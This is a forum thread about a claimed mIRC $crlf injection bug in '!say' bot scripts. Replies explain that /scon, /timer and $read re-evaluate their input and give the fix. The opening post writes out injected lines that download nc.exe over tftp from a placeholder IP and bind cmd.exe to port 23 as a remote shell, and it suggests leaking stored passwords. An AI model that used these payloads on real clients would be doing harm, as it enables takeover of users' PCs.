Forums Bug Reports $crlf bug

I just found a bug on MIRC on users with !say commands activated.
The bug includes remote execution of commands using $crlf
example if someone has !say script running.
!say something $crlf join #123
and the script will only say something, then execute the /join command after that.

This could be major if someone dont have /run locked.
someone could get total control of a pc with two lines
!say test $crlf run tftp -i <ip> get nc.exe
!say test $crlf run nc.exe -l -p 23 -e cmd.exe
voila! you got instant access on port 23!
other bugs include $chr(13)
even get the passwords in you client with !say %passwd or something.

that is not a bug, $crlf specifies the end of command when the server reads it.
also, your example with the run won't work because it will send run to the server rather then executing it on mirc

Did a little test...here are the results:

(6:59am) <baddie> !say something $crlf join #123
(6:59am) <averageuser> something $crlf join #123

$crlf is perfectly safe.

Used this script btw:

yes, also it will join the channel only if you evaluate $($1-,2) which not recommended

you shouldnt store your password any way.

There's no bug here. My guess is that you're using /scon (or /scid), probably to relay messages to a channel on another network. Passing $1- to /scon has the side-effects that you mentioned because /scon re-evaluates the parameters passed to it. Use something likeor/timer behaves the same way as /scon (re-evaluates the parameters passed to it each time it fires), so you need to watch out for that too.

hey, thanks, i never thought this much get replies. Anyways, thanks for all the feedback. I worked it out. Actually i was using $read(filename.txt , %linenumber)
cause i allow certain users to add descriptions to stuffs with my bot and add it to a text file. I used $replace to add a - to words with $ and %. Anyways to Scatman.That's exactly what i ended up finding out after playing with it. So i guess it's not that serious. Anyways, thanks for all the feedbacks again.

Ah, in the case of $read, you can just use the n switch to avoid re-evaluation of the line contents:$read(file.txt,N) acts as $eval($read(file.txt,n,N),2).

Btw, $(string,N) (mentioned by ScatMan) and $eval(string,N) are equivalent.

ah cool, thanks for the info man!!
I have already edited my bot's script, and patched it the hard way replacing all $'s in the descriptions.
I guess i can put it back on when i finish my bot's next version,